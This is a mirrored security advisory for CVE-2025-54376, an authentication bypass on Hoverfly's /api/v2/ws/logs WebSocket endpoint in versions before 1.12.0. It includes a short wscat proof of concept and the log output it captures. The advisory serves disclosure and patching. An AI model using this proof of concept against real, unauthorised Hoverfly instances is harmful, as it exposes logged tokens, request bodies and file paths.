GHSA-jxmr-2h4q-rhxp

Опубликовано: 10 сент. 2025

Источник: github

Github: Прошло ревью

CVSS4: 7.8

Описание

WebSocket endpoint /api/v2/ws/logs reachable without authentication even when --auth is enabled

Summary

Hoverfly’s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API. Consequently, an unauthenticated remote attacker can:

Stream real-time application logs (information disclosure).
Gain insight into internal file paths, request/response bodies, and other potentially sensitive data emitted in logs.

PoC

Start Hoverfly with authentication enabled:

./hoverfly -auth

Confirm REST API requires credentials:

curl -i http://localhost:8888/api/v2/hoverfly/version

Connect to the WebSocket endpoint without credentials:

wscat -c ws://localhost:8888/api/v2/ws/logs # Connected (press CTRL+C to quit) # … logs stream immediately … (You would need to send a message to start receiving stream)

wscat -c ws://localhost:8888/api/v2/ws/logs Connected (press CTRL+C to quit) > hi! < {"logs":[{"level":"info","msg":"Log level set to verbose","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"Using memory backend","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"User added successfully","time":"2025-07-20T17:07:00+05:30","username":""},{"level":"info","msg":"Enabling proxy authentication","time":"2025-07-20T17:07:00+05:30"},{"Destination":".","Mode":"simulate","ProxyPort":"8500","level":"info","msg":"Proxy prepared...","time":"2025-07-20T17:07:00+05:30"},{"destination":".","level":"info","mode":"simulate","msg":"current proxy configuration","port":"8500","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"serving proxy","time":"2025-07-20T17:07:00+05:30"},{"AdminPort":"8888","level":"info","msg":"Admin interface is starting...","time":"2025-07-20T17:07:00+05:30"},{"level":"debug","message":"hi!","msg":"Got message...","time":"2025-07-20T17:09:04+05:30"}]} < ... < ...

Impact

Authentication bypass; an attacker receives full application logs, including proxied request/response bodies, tokens, file paths, etc.

Ссылки

Пакеты

Наименование

github.com/SpectoLabs/hoverfly

Затронутые версииВерсия исправления

< 1.12.0

1.12.0

EPSS

Процентиль: 36%

0.00149

Низкий

7.8 High

CVSS4

CVE ID

CVE-2025-54376

Дефекты

CWE-200

CWE-287

Связанные уязвимости

CVE-2025-54376

CVSS3: 7.5

nvd

5 месяцев назад

Hoverfly is an open source API simulation tool. In versions 1.11.3 and prior, Hoverfly’s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API. Consequently, an unauthenticated remote attacker can stream real-time application logs (information disclosure) and/or gain insight into internal file paths, request/response bodies, and other potentially sensitive data emitted in logs. Version 1.12.0 contains a fix for the issue.

EPSS

Процентиль: 36%

0.00149

Низкий

7.8 High

CVSS4

CVE ID

CVE-2025-54376

Дефекты

CWE-200

CWE-287